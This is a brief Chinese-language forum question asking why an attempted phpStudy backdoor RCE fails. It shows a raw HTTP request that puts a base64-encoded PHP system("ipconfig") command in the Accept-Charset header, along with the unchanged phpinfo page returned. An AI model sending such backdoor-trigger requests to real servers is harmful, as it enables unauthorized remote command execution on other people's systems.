phpstudy执行RCE漏洞不成功:
GET /phpinfo.php HTTP/1.1
Accept-Charset:c3lzdGVtKCJpcGNvbmZpZyIpOw==
Accept-Encoding: gzip,deflate
Connection: close
Referer: http://192.168.120.130/
Upgrade-Insecure-Requests: 1
#encoding去掉了空格
#charset是用base64编码
为什么执行命令后,并没有成功,还是和原来一样,如下:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;